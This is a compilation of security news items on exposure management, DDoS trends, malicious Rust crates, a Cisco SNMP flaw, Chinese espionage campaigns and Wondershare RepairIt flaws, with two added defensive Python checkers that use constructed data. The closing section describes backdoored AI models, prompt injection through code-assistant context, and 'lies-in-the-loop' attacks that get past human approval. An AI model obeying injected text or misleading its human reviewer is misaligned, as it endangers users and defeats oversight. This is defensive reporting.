So teams grind themselves down chasing ghosts. They burn cycles on vulnerabilities that will never be used in an attack, while a handful of the ones that do matter slip through, unnoticed.
It’s security theater masquerading as risk reduction. In reality, the actual risk scenario looks very different. Once you factor in existing security controls, only around 10% of real-world vulnerabilities are truly critical. Which means that 84% of so-called “critical” alerts amount to false urgency, again draining time, budget, and focus that could, and should, be spent on real threats.
Enter Continuous Threat Exposure Management (CTEM)
Continuous Threat Exposure Management (CTEM) was developed to end the never-ending treadmill. Instead of drowning teams in theoretical “critical” findings, it replaces volume with clarity through two essential steps.
- Prioritization ranks exposures by real business impact, not abstract severity scores.
- Validation pressure-tests those prioritized exposures against your specific environment, uncovering which ones attackers can actually exploit.
One without the other fails. Prioritization alone is just educated guesswork. Validation alone wastes cycles on hypotheticals and the wrong issues. But together they convert assumptions into evidence and endless lists into focused, realistic action.
Figure 2: CTEM in Action
And the scope goes far beyond CVEs. As Gartner predicts, by 2028, more than half of exposures will stem from nontechnical weaknesses like misconfigured SaaS apps, leaked credentials, and human error. Happily, CTEM addresses this head-on, applying the same disciplined prioritize-then-validate action chain across every kind of exposure. That’s why CTEM isn’t just a framework.
It’s a necessary evolution from chasing alerts to proving risk, and from fixing everything to fixing what matters most.
Automating Validation with Adversarial Exposure Validation (AEV) Technologies
CTEM demands validation, but validation requires finesse and adversarial context, which Adversarial Exposure Validation (AEV) technologies deliver. They help further cut through inflated “priority” lists and prove in practice which exposures will actually open the door to attackers. Two technologies drive this automation:
- Breach and Attack Simulation (BAS) continuously and safely simulates and emulates adversarial techniques like ransomware payloads, lateral movement, and data exfiltration to verify whether your specific security controls will actually stop what they’re supposed to. It’s not a one-time exercise but an ongoing practice, with scenarios mapped to the MITRE ATT&CK® threat framework for relevance, consistency and coverage.
- Automated Penetration Testing goes further by chaining vulnerabilities and misconfigurations the way real attackers do. It excels at exposing and exploiting complex attack paths that include Kerberoasting in Active Directory or privilege escalation through mismanaged identity systems. Instead of relying on an annual pentest, Automated Pentesting lets teams run meaningful tests on demand, as often as needed.
Figure 3: BAS and Automated Penetration Testing Use Cases
Together, BAS and Automated Pentesting provide your teams with the attacker’s perspective at scale. They reveal not just the threats that look dangerous, but what’s actually exploitable, detectable, and defendable in your environment. This shift is critical for dynamic infrastructures where endpoints spin up and down daily, credentials can leak across SaaS apps, and configurations change with every sprint. In today’s increasingly dynamic environments, static assessments can’t help but fall behind.
BAS and Automated Pentesting keep the validation continuous, turning exposure management from theoretical into real-world proof.
A Real-Life Case: Adversarial Exposure Validation (AEV) in Action
Take Log4j as an example. When it first surfaced, every scanner lit up red. CVSS scores gave it a 10.0 (Critical), EPSS models flagged high exploit probability, and asset inventories showed it was scattered across environments.
Traditional methods left security teams with a flat picture, instructing them to treat every instance as equally urgent. The result? Resources quickly spread thin, wasting time chasing duplicates of the same problem. Adversarial Exposure Validation changes the narrative.
By validating in context, teams quickly see that not every Log4j instance is a crisis. One system might already have effective WAF rules, compensating controls, or segmentation that drops its risk score from a 10.0 to a 5.2. That reprioritization shifts it from “drop everything now” with klaxons blaring, to “patch as part of normal cycles”. Meanwhile, Adversarial Exposure Validation can also reveal the opposite scenario: a seemingly low-priority misconfiguration in a SaaS app could chain directly to sensitive data exfiltration, elevating it from “medium” to “urgent.”
Figure 4: Validating the Log4j Vulnerability to its True Risk Score
Adversarial Exposure Validation delivers real value to your security teams by measuring:
- Control effectiveness: Proving if an exploit attempt is blocked, logged, or ignored.
- Detection and response: Showing whether SOC teams are seeing the activity and IR teams are containing it fast enough.
- Operational readiness: Exposing weak links in workflows, escalation paths, and containment procedures.
In practice, Adversarial Exposure Validation transforms Log4j, or any other vulnerability, from a generic “critical everywhere” all-hands-on-deck nightmare into a precise risk map. It tells CISOs and security teams not just what’s out there, but which of the threats that are out there actually matter for their environment today.
The Future of Validation: The Picus BAS Summit 2025
Continuous Threat Exposure Management (CTEM) provides much-needed clarity that comes from two engines working together: prioritization to focus effort, and validation to prove what matters. Adversarial Exposure Validation (AEV) technologies help bring this vision to life. By combining Breach and Attack Simulation (BAS) and Automated Penetration Testing, they’re able to show security teams the attacker’s perspective at scale, surfacing not just what could happen, but what will happen if existing gaps go unaddressed. To see Adversarial Exposure Validation (AEV) technologies in action, join Picus Security, SANS, Hacker Valley, and other prominent security leaders at The Picus BAS Summit 2025: Redefining Attack Simulation through AI.
This virtual summit will showcase how BAS and AI are shaping the future of security validation, with insights from analysts, practitioners, and innovators driving the field forward. This article is a contributed piece from one of our valued partners.
Tech Overtakes Gaming as Top DDoS Attack Target, New Gcore Radar Report Finds
The latest Gcore Radar report, analyzing attack data from Q1–Q2 2025, reveals a 41% year-on-year increase in total attack volume. The largest attack peaked at 2.2 Tbps, surpassing the 2 Tbps record in late 2024. Attacks are growing not only in scale but in sophistication, with longer durations, multi-layered strategies, and a shift in target industries. Technology now overtakes gaming as the most attacked sector, while the financial services industry continues to face heightened risks.
Key takeaways: the evolving DDoS landscape
Here are five key insights from the Q1–Q2 2025 Gcore Radar report:
- Attack volumes are rising. Total attacks climbed from 969,000 in H2 2024 to 1.17 million in H1 2025, a 21% increase over the previous two quarters and 41% YoY growth.
- Attack size continues to grow. The peak attack of 2.2 Tbps demonstrates the increasing scale and destructive potential of modern DDoS campaigns.
- Attacks are becoming longer and more sophisticated. Extended durations and multi-layered tactics allow threat actors to bypass defenses and maximize disruption.
- The industries targeted are shifting. Technology overtakes gaming as the top target, while financial services is being increasingly targeted.
- Application-layer attacks are on the rise. Multi-vector assaults targeting web applications and APIs now account for 38% of total attacks, up from 28% in Q3–Q4 2024.
DDoS attack frequency has surged
Gcore Radar highlights a continued upward trajectory in DDoS activity. Compared to H2 2024, attack volumes rose 21%, while YoY growth reached 41%, underscoring a long-term escalation trend. Several factors contribute to this rise:
- Accessible attack tools: Cheap DDoS-for-hire services empower more threat actors.
- Vulnerable IoT devices: Unsecured devices are hijacked into large-scale botnets, amplifying attack volumes.
- Geopolitical and economic tensions: Global instability drives more frequent and targeted attacks.
- Advanced attack techniques: Multi-vector and application-layer attacks increase both complexity and impact.
The largest attack reached 2.2 Tbps
The peak assault in Q1–Q2 2025 hit 2.2 Tbps, surpassing late 2024’s 2 Tbps attack. While attacks exceeding 1 Tbps remain rare, their frequency is rising, highlighting attackers’ growing ambition to overwhelm networks, applications, and services. Even smaller attacks can incapacitate unprotected systems.
Industries targeted are shifting
Technology now represents 30% of all DDoS attacks, overtaking gaming (19%). Hosting providers supporting SaaS, e-commerce, gaming, and financial clients are particularly vulnerable, as a single attack can trigger ripple effects across multiple dependent businesses.
Financial services account for 21% of attacks. Banks and payment systems are prime targets due to high disruption potential, regulatory sensitivity, and ransomware risk.
Gaming continues to face significant threats, but improved defenses and strategic attacker shifts reduced its share from 34% in H2 2024 to 19% in H1 2025. Key drivers of ongoing attacks include competitive advantage and revenue impact.
Telecommunications now make up 13% of attacks, reflecting their role as critical internet infrastructure.
Media, entertainment, and retail see more moderate attack levels, with media at 10% and retail at 5–6%.
Attack duration and tactics
Recent data shows a shift toward longer, more sustained assaults.
- Attacks under 10 minutes decreased by roughly 33%, while 10–30 minute attacks nearly quadrupled.
- Maximum attack duration slightly decreased, from five hours to three, indicating a focus on concentrated, high-impact campaigns.
- Short bursts remain preferred. Despite longer attacks gaining prevalence, brief attacks remain highly disruptive, evading automated defenses and often serving as smokescreens for multi-stage cyberattacks.
Attack vectors
In terms of network-layer attack vectors, UDP flood attacks remain dominant, accounting for 56% of network-layer attacks, followed by SYN floods (17%), TCP floods (10%), ACK floods (8%), and ICMP (6%). Multi-vector approaches allow attackers to mask malicious activity as legitimate traffic. ACK flood attacks continue to rise, now making up 8% of network-layer traffic, highlighting their ability to bypass detection.
Application-layer attack vectors
L7 UDP floods dominate (62%), followed by L7 TCP floods (33%), with other attack types at 5%. Attackers increasingly exploit business logic and APIs to disrupt operations beyond traditional network overload.
Geographical trends
The United States and the Netherlands remain top sources for network-layer attacks. Hong Kong emerges as a new significant source, contributing 17% of network-layer and 10% of application-layer attacks. These findings highlight the need for proactive, geographically aware defenses.
Multi-layered attacks highlight the critical role of WAAP
Attackers are increasingly targeting web applications and APIs, exploiting inventory systems, payment flows, and customer interaction points. These attacks often combine volumetric disruption with manipulation of economic logic, affecting sectors such as e-commerce, logistics, online banking, and public services.
Gcore DDoS Protection: defending against evolving threats
Gcore DDoS Protection leverages 200+ Tbps filtering capacity across 210+ PoPs worldwide, neutralizing attacks in real time. Integrated Web Application and API Protection (WAAP) combines DDoS mitigation, bot management, and API security to protect critical assets while maintaining performance.
This article is a contributed piece from one of our valued partners.
Malicious Rust Crates Steal Solana and Ethereum Keys — 8,424 Downloads Confirmed
Cybersecurity researchers have discovered two malicious Rust crates impersonating a legitimate library called fast_log to steal Solana and Ethereum wallet keys from source code. The crates, named faster_log and async_println, were published by the threat actor under the aliases rustguruman and dumbnbased on May 25, 2025, amassing 8,424 downloads in total, according to software supply chain security company Socket. “The crates include working logging code for cover and embed routines that scan source files for Solana and Ethereum private keys, then exfiltrate matches via HTTP POST to a hardcoded command and control (C2) endpoint,” security researcher Kirill Boychenko said. Following responsible disclosure, the maintainers of crates.io have taken steps to remove the Rust packages and disable the two accounts.
The maintainers have also preserved logs of the threat actor-operated users along with the malicious crates for further analysis. “The malicious code was executed at runtime, when running or testing a project depending on them,” Crates.io’s Walter Pearce said. “Notably, they did not execute any malicious code at build time. Except for their malicious payload, these crates copied the source code, features, and documentation of legitimate crates, using a similar name to them.”
The typosquatting attack, as detailed by Socket, involved the threat actors retaining the logging functionality of the actual library, while introducing malicious code changes during a log packing operation that recursively searched Rust files (*.rs) in a directory for Ethereum and Solana private keys and bracketed byte arrays and exfiltrated them to a Cloudflare Workers domain (“mainnet.solana-rpc-pool.workers[.]dev”).
Besides copying fast_log’s README and setting the bogus crates’ repository field to the real GitHub project, the use of “mainnet.solana-rpc-pool.workers[.]dev” is an attempt to mimic Solana’s Mainnet beta RPC endpoint “api.mainnet-beta.solana[.]com.” According to crates.io, the two crates did not have any dependent downstream crates, nor did the users publish other crates on the Rust package registry. The GitHub accounts linked to the crates.io publisher accounts remain accessible as of writing. While the GitHub account dumbnbased was created on May 27, 2023, rustguruman did not exist until May 25, 2025 – the same day the crates were uploaded. “This campaign shows how minimal code and simple deception can create a supply chain risk,” Boychenko said.
“A functional logger with a familiar name, copied design, and README can pass casual review, while a small routine posts private wallet keys to a threat actor-controlled C2 endpoint. Unfortunately, that is enough to reach developer laptops and CI.”
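A way to check your own projects for the two crates named above, as an added example (not Socket's or crates.io's tooling): it reads a Cargo.lock, flags `faster_log` and `async_println`, and walks the dependency graph backwards to show which of your packages pulled them in. The lockfile content, the placeholder versions and the function names are constructed assumptions.

```python
import re

# Crate names reported as malicious on this page.
REPORTED_MALICIOUS = {"faster_log", "async_println"}


def parse_cargo_lock(text):
    """Minimal Cargo.lock reader: one dict per [[package]] table."""
    packages, current, in_deps = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "[[package]]":
            current = {"name": None, "version": None, "source": None, "deps": []}
            packages.append(current)
            in_deps = False
        elif line.startswith("["):
            current = None  # some other table, e.g. [metadata]: not a package
        elif current is None or not line or line.startswith("#"):
            continue
        elif in_deps:
            if line.startswith("]"):
                in_deps = False
            else:
                # Entries are "name", "name version" or "name version (source)".
                current["deps"].append(line.strip('",').split(" ")[0])
        elif line.startswith("dependencies"):
            in_deps = not line.endswith("]")
        else:
            m = re.match(r'(name|version|source)\s*=\s*"(.*)"$', line)
            if m:
                current[m.group(1)] = m.group(2)
    return packages


def find_reported(packages):
    """Map each reported crate in the lockfile to its version, source and
    every package that depends on it, directly or transitively."""
    reverse = {}
    for pkg in packages:
        for dep in pkg["deps"]:
            reverse.setdefault(dep, set()).add(pkg["name"])
    findings = {}
    for pkg in packages:
        if pkg["name"] not in REPORTED_MALICIOUS:
            continue
        seen, stack = set(), [pkg["name"]]
        while stack:
            for parent in reverse.get(stack.pop(), ()):
                if parent not in seen:
                    seen.add(parent)
                    stack.append(parent)
        findings[pkg["name"]] = {
            "version": pkg["version"],
            "source": pkg["source"],
            "pulled_in_by": sorted(seen),
        }
    return findings


# Constructed lockfile. Versions are placeholders; workspace members carry no "source".
SAMPLE_LOCK = '''
version = 3

[[package]]
name = "my_wallet_tool"
version = "0.1.0"
dependencies = [
 "log_helpers",
 "fast_log",
]

[[package]]
name = "log_helpers"
version = "0.2.0"
dependencies = [
 "faster_log 0.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
]

[[package]]
name = "faster_log"
version = "0.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "fast_log"
version = "0.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
'''

if __name__ == "__main__":
    for name, info in find_reported(parse_cargo_lock(SAMPLE_LOCK)).items():
        print(name, info["version"], "pulled in by", ", ".join(info["pulled_in_by"]))
```

Because the page reports that the payload ran at runtime rather than at build time, a hit here is a reason to check where the dependent binaries and tests were actually executed.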
Cisco Warns of Actively Exploited SNMP Vulnerability Allowing RCE or DoS in IOS Software
Cisco has warned of a high-severity security flaw in IOS Software and IOS XE Software that could allow a remote attacker to execute arbitrary code or trigger a denial-of-service (DoS) condition under specific circumstances. The company said the vulnerability, CVE-2025-20352 (CVSS score: 7.7), has been exploited in the wild, adding it became aware of it “after local Administrator credentials were compromised.”
The issue, per the networking equipment major, is rooted in the Simple Network Management Protocol (SNMP) subsystem, arising as a result of a stack overflow condition. An authenticated, remote attacker could exploit the flaw by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks, resulting in DoS if they have low privileges, or in arbitrary code execution as root if they have high privileges, ultimately taking control of the susceptible system. However, Cisco noted that for this to happen, the following conditions need to be met:
- To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials
- To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device
The company said the issue affects all versions of SNMP, as well as Meraki MS390 and Cisco Catalyst 9300 Series Switches that are running Meraki CS 17 and earlier.
It has been fixed in Cisco IOS XE Software Release 17.15.4a. Cisco IOS XR Software and NX-OS Software are not impacted. “This vulnerability affects all versions of SNMP. All devices that have SNMP enabled and have not explicitly excluded the affected object ID (OID) should be considered vulnerable,” Cisco said.
While there are no workarounds that resolve CVE-2025-20352, one mitigation proposed by Cisco involves allowing only trusted users to have SNMP access on an affected system, and monitoring the systems by running the “show snmp host” command. “Administrators can disable the affected OIDs on a device,” it added. “Not all software will support the OID that is listed in the mitigation. If the OID is not valid for specific software, then it is not affected by this vulnerability.
Excluding these OIDs may affect device management through SNMP, such as discovery and hardware inventory.”
Chinese Hackers RedNovember Target Global Governments Using Pantegana and Cobalt Strike
A suspected cyber espionage activity cluster that was previously found targeting global government and private sector organizations spanning Africa, Asia, North America, South America, and Oceania has been assessed to be a Chinese state-sponsored threat actor. Recorded Future, which was tracking the activity under the moniker TAG-100, has now graduated it to a hacking group dubbed RedNovember. It’s also tracked by Microsoft as Storm-2077. “Between June 2024 and July 2025, RedNovember (which overlaps with Storm-2077) targeted perimeter appliances of high-profile organizations globally and used the Go-based backdoor Pantegana and Cobalt Strike as part of its intrusions,” the Mastercard-owned company said in a report shared with The Hacker News.
“The group has expanded its targeting remit across government and private sector organizations, including defense and aerospace organizations, space organizations, and law firms.” Some of the likely new victims of the threat actor include a ministry of foreign affairs in central Asia, a state security organization in Africa, a European government directorate, and a Southeast Asian government. The group is also believed to have breached at least two United States (U.S.) defense contractors, a European engine manufacturer, and a trade-focused intergovernmental cooperation body in Southeast Asia.
RedNovember was first documented by Recorded Future over a year ago, detailing its use of the Pantegana post-exploitation framework and Spark RAT following the weaponization of known security flaws in several internet-facing perimeter appliances from Check Point (CVE-2024-24919), Cisco, Citrix, F5, Fortinet, Ivanti, Palo Alto Networks (CVE-2024-3400), and SonicWall for initial access. The focus on targeting security solutions such as VPNs, firewalls, load balancers, virtualization infrastructure, and email servers mirrors a trend that has been increasingly adopted by other Chinese state-sponsored hacking groups to break into networks of interest and maintain persistence for extended periods of time.
A noteworthy aspect of the threat actor’s tradecraft is the use of Pantegana and Spark RAT, both of which are open-source tools. The adoption is likely an attempt to repurpose existing programs to their advantage and confuse attribution efforts, a hallmark of espionage actors. The attacks also involve the use of a variant of the publicly available Go-based loader LESLIELOADER to launch Spark RAT or Cobalt Strike Beacons on compromised devices. RedNovember is said to make use of VPN services like ExpressVPN and Warp VPN to administer and connect to two sets of servers that are used for exploitation of internet-facing devices and communicate with Pantegana, Spark RAT, and Cobalt Strike, another legitimate program that has been widely abused by bad actors.
Between June 2024 and May 2025, much of the hacking group’s targeting efforts have been focused on Panama, the U.S., Taiwan, and South Korea. As recently as April 2025, it has been found to target Ivanti Connect Secure appliances associated with a newspaper and an engineering and military contractor, both based in the U.S. Recorded Future said it also identified the adversary likely targeting the Microsoft Outlook Web Access (OWA) portals belonging to a South American country before that country’s state visit to China. “RedNovember has historically targeted a diverse range of countries and sectors, suggesting broad and changing intelligence requirements,” the company noted.
“RedNovember’s activity to date has primarily focused on several key geographies, including the U.S., Southeast Asia, the Pacific region, and South America.”
UNC5221 Uses BRICKSTORM Backdoor to Infiltrate U.S. Legal and Technology Sectors
Companies in the legal services, software-as-a-service (SaaS) providers, Business Process Outsourcers (BPOs), and technology sectors in the U.S. have been targeted by a suspected China-nexus cyber espionage group to deliver a known backdoor referred to as BRICKSTORM. The activity, attributed to UNC5221 and closely related, suspected China-nexus threat clusters, is designed to facilitate persistent access to victim organizations for over a year, Mandiant and Google Threat Intelligence Group (GTIG) said in a new report shared with The Hacker News. It’s assessed that the objective of BRICKSTORM targeting SaaS providers is to gain access to downstream customer environments or the data SaaS providers host on their customers’ behalf, while the targeting of the U.S. legal and technological spheres is likely an attempt to gather information related to national security and international trade, as well as steal intellectual property to advance the development of zero-day exploits.
BRICKSTORM was first documented by the tech giant last year in connection with the zero-day exploitation of Ivanti Connect Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887). It has also been used to target Windows environments in Europe since at least November 2022. A Go-based backdoor, BRICKSTORM comes fitted with capabilities to set itself up as a web server, perform file system and directory manipulation, carry out file operations such as upload/download, execute shell commands, and act as a SOCKS relay.
It communicates with a command-and-control (C2) server using WebSockets. Earlier this year, the U.S. government noted that the China-aligned threat cluster tracked as APT27 (aka Emissary Panda) overlaps with that of Silk Typhoon, UNC5221, and UTA0178. However, GTIG told The Hacker News at the time that it does not have enough evidence on its own to confirm the link and that it’s treating them as two distinct entities.
“These intrusions are conducted with a particular focus on maintaining long term stealthy access by deploying backdoors on appliances that do not support traditional endpoint detection and response (EDR) tools,” GTIG said, adding it has responded to several intrusions since March 2025. “The actor employs methods for lateral movement and data theft that generate minimal to no security telemetry. This, coupled with modifications to the BRICKSTORM backdoor, has enabled them to remain undetected in victim environments for 393 days, on average.” In at least one case, the threat actors are said to have exploited the aforementioned security flaws in Ivanti Connect Secure edge devices to obtain initial access and drop BRICKSTORM. But the prolonged dwell time and the threat actor’s efforts to erase traces of their activity have made it challenging to determine the initial access vector used in other instances to deliver the malware on Linux and BSD-based appliances from multiple manufacturers.
There is evidence to suggest that the malware is under active development, with one sample featuring a “delay” timer that waits for a hard-coded date months in the future before initiating contact with its C2 server. The BRICKSTORM variant, Google said, was deployed on an internal VMware vCenter server after the targeted organization had commenced its incident response efforts, indicating the agility of the hacking group to maintain persistence. The attacks are also characterized by the use of a malicious Java Servlet filter for the Apache Tomcat server dubbed BRICKSTEAL to capture vCenter credentials for privilege escalation, subsequently using it to clone Windows Server VMs for key systems such as Domain Controllers, SSO Identity Providers, and secret vaults. “Normally, installing a filter requires modifying a configuration file and restarting or reloading the application; however, the actor used a custom dropper that made the modifications entirely in memory, making it very stealthy and negating the need for a restart,” Google said.
Furthermore, the threat actors have been found to leverage valid credentials for lateral movement to pivot to the VMware infrastructure and establish persistence by modifying init.d, rc.local, or systemd files to ensure that the backdoor is automatically started on appliance reboot. Another method involves deploying a JavaServer Pages (JSP) web shell known as SLAYSTYLE (aka BEEFLUSH) to receive and execute arbitrary operating system commands passed through an HTTP request. The primary goal of the campaign is to access the emails of key individuals within the victim entities, including developers, system administrators, and individuals involved in matters that align with China’s economic and espionage interests. BRICKSTORM’s SOCKS proxy feature is used to create a tunnel and directly access the applications deemed of interest to the attackers.
Google said it has developed a shell script scanner for potential victims to figure out if they’ve been impacted by BRICKSTORM activity on Linux and BSD-based appliances and systems. The tool works by flagging files that match known signatures of the malware. That said, it’s not guaranteed to detect an infection in all cases or scan for other indicators of compromise (IoCs). “The BRICKSTORM campaign represents a significant threat due to its sophistication, evasion of advanced enterprise security defenses, and focus on high-value targets,” Charles Carmakal, CTO of Mandiant Consulting at Google Cloud, said in a statement shared with The Hacker News.
“The access obtained by UNC5221 enables them to pivot to downstream customers of compromised SaaS providers or discover zero-day vulnerabilities in enterprise technologies, which can be used for future attacks. We encourage organizations to hunt for BRICKSTORM and other backdoors that may reside on their systems that do not have endpoint detection and response (EDR) coverage.”
Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models
Cybersecurity researchers have disclosed two security flaws in Wondershare RepairIt that exposed private user data and potentially exposed the system to artificial intelligence (AI) model tampering and supply chain risks. The critical-rated vulnerabilities in question, discovered by Trend Micro, are listed below -
CVE-2025-10643 (CVSS score: 9.1) - An authentication bypass vulnerability that exists within the permissions granted to a storage account token
CVE-2025-10644 (CVSS score: 9.4) - An authentication bypass vulnerability that exists within the permissions granted to an SAS token
Successful exploitation of the two flaws can allow an attacker to circumvent authentication protection on the system and launch a supply chain attack, ultimately resulting in the execution of arbitrary code on customers’ endpoints. Trend Micro researchers Alfredo Oliveira and David Fiser said the AI-powered data repair and photo editing application “contradicted its privacy policy by collecting, storing, and, due to weak Development, Security, and Operations (DevSecOps) practices, inadvertently leaking private user data.” The poor development practices include embedding overly permissive cloud access tokens directly in the application’s code that enable read and write access to sensitive cloud storage. Furthermore, the data is said to have been stored without encryption, potentially opening the door to wider abuse of users’ uploaded images and videos.
To make matters worse, the exposed cloud storage contains not only user data but also AI models, software binaries for various products developed by Wondershare, container images, scripts, and company source code, enabling an attacker to tamper with AI models or the executables, paving the way for supply chain attacks targeting its downstream customers. “Because the binary automatically retrieves and executes AI models from the unsecure cloud storage, attackers could modify these models or their configurations and infect users unknowingly,” the researchers said. “Such an attack could distribute malicious payloads to legitimate users through vendor-signed software updates or AI model downloads.” Beyond customer data exposure and AI model manipulation, the issues can also pose grave consequences, ranging from intellectual property theft and regulatory penalties to erosion of consumer trust. The cybersecurity company said it responsibly disclosed the two issues through its Zero Day Initiative (ZDI) in April 2025, but noted that it has yet to receive a response from the vendor despite repeated attempts.
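As an added illustration of the embedded-token problem described above (not code from Trend Micro or Wondershare), this Python check scans text, such as strings extracted from an application binary, for SAS URLs and flags write-capable permissions, account-level scope, and long lifetimes. It assumes the Azure Storage SAS query format (sp, srt, se, sig), which the article does not name; the account name, signature values, 7-day limit, and function names are constructed for the example.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# URLs that carry a SAS signature parameter (sig=...).
SAS_URL = re.compile(r"https://[^\s\"'<>]+[?&]sig=[^\s\"'<>]+")
MUTATING = {"w": "write", "d": "delete", "a": "add", "c": "create"}

def parse_expiry(value):
    """Parse the ISO 8601 UTC forms commonly seen in the se= field."""
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%MZ", "%Y-%m-%d"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None

def audit_sas(url, now, max_days=7):
    """Return findings for one SAS URL; max_days is an assumed policy limit."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    perms, findings = q.get("sp", ""), []
    granted = [name for flag, name in MUTATING.items() if flag in perms]
    if granted:
        findings.append("mutating permissions: " + ", ".join(granted))
    if "l" in perms:
        findings.append("list permission allows enumerating stored objects")
    if "srt" in q:  # srt appears only on account-level SAS tokens
        findings.append("account-level token (srt=%s)" % q["srt"])
    if "se" in q:
        expiry = parse_expiry(q["se"])
        if expiry is None:
            findings.append("unparseable expiry: " + q["se"])
        elif (expiry - now).days > max_days:
            findings.append("expires in %d days" % (expiry - now).days)
    return findings

def scan_text(text, now):
    """Map every SAS URL found in text to its list of findings."""
    return {url: audit_sas(url, now) for url in SAS_URL.findall(text)}

# Constructed sample: strings as they might be pulled from an application binary.
SAMPLE = '''
upload = "https://exampleacct.blob.core.windows.net/?sv=2022-11-02&ss=b&srt=sco&sp=rwdlac&se=2030-01-01T00:00:00Z&sig=CONSTRUCTED"
model = "https://exampleacct.blob.core.windows.net/models/m.onnx?sv=2022-11-02&sr=b&sp=r&se=2025-10-02T00:00:00Z&sig=CONSTRUCTED"
'''
NOW = datetime(2025, 9, 26, tzinfo=timezone.utc)

if __name__ == "__main__":
    for url, findings in scan_text(SAMPLE, NOW).items():
        print(url.split("?")[0], "->", findings or "no findings")
```

A read-only, single-object token with a short lifetime passes cleanly, while the account-level read/write token produces four findings; any hit in shipped client code is a reason to move token issuance server-side.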
In the absence of a fix, users are recommended to “restrict interaction with the product.” “The need for constant innovations fuels an organization’s rush to get new features to market and maintain competitiveness, but they might not foresee the new, unknown ways these features could be used or how their functionality may change in the future,” Trend Micro said. “This explains how important security implications may be overlooked. That is why it is crucial to implement a strong security process throughout one’s organization, including the CD/CI pipeline.”
The Need for AI and Security to Go Hand in Hand
The development comes as Trend Micro previously warned against exposing Model Context Protocol (MCP) servers without authentication or storing sensitive credentials such as MCP configurations in plaintext, which threat actors can exploit to gain access to cloud resources, databases, or inject malicious code. “Each MCP server acts as an open door to its data source: databases, cloud services, internal APIs, or project management systems,” the researchers said.
“Without authentication, sensitive data such as trade secrets and customer records becomes accessible to everyone.” In December 2024, the company also found that exposed container registries could be abused to gain unauthorized access and pull target Docker images to extract the AI model within it, modify the model’s parameters to influence its predictions, and push the tampered image back to the exposed registry. “The tampered model could behave normally under typical conditions, only displaying its malicious alterations when triggered by specific inputs,” Trend Micro said. “This makes the attack particularly dangerous, as it could bypass basic testing and security checks.” The supply chain risk posed by MCP servers has also been highlighted by Kaspersky, which devised a proof-of-concept (PoC) exploit to highlight how MCP servers installed from untrusted sources can conceal reconnaissance and data exfiltration activities under the guise of an AI-powered productivity tool. “Installing an MCP server basically gives it permission to run code on a user machine with the user’s privileges,” security researcher Mohamed Ghobashy said.
“Unless it is sandboxed, third-party code can read the same files the user has access to and make outbound network calls – just like any other program.” The findings show that the rapid adoption of MCP and AI tools in enterprise settings to enable agentic capabilities, particularly without clear policies or security guardrails, can open brand new attack vectors, including tool poisoning, rug pulls, shadowing, prompt injection, and unauthorized privilege escalation. In a report published last week, Palo Alto Networks Unit 42 revealed that the context attachment feature used in AI code assistants to bridge an AI model’s knowledge gap can be susceptible to indirect prompt injection, where adversaries embed harmful prompts within external data sources to trigger unintended behavior in large language models (LLMs). Indirect prompt injection hinges on the assistant’s inability to differentiate between instructions issued by the user and those surreptitiously embedded by the attacker in external data sources. Thus, when a user inadvertently supplies to the coding assistant third-party data (e.g., a file, repository, or URL) that has already been tainted by an attacker, the hidden malicious prompt could be weaponized to trick the tool into executing a backdoor, injecting arbitrary code into an existing codebase, and even leaking sensitive information.
“Adding this context to prompts enables the code assistant to provide more accurate and specific output,” Unit 42 researcher Osher Jacob said. “However, this feature could also create an opportunity for indirect prompt injection attacks if users unintentionally provide context sources that threat actors have contaminated.” AI coding agents have also been found vulnerable to what’s called a “lies-in-the-loop” (LitL) attack that aims to convince the LLM that the instructions it’s been fed are much safer than they really are, effectively overriding human-in-the-loop (HitL) defenses put in place when performing high-risk operations. “LitL abuses the trust between a human and the agent,” Checkmarx researcher Ori Ron said. “After all, the human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given.
It’s easy to lie to the agent, causing it to provide fake, seemingly safe context via commanding and explicit language in something like a GitHub issue.” “And the agent is happy to repeat the lie to the user, obscuring the malicious actions the prompt is meant to guard against, resulting in an attacker essentially making the agent an accomplice in getting the keys to the kingdom.”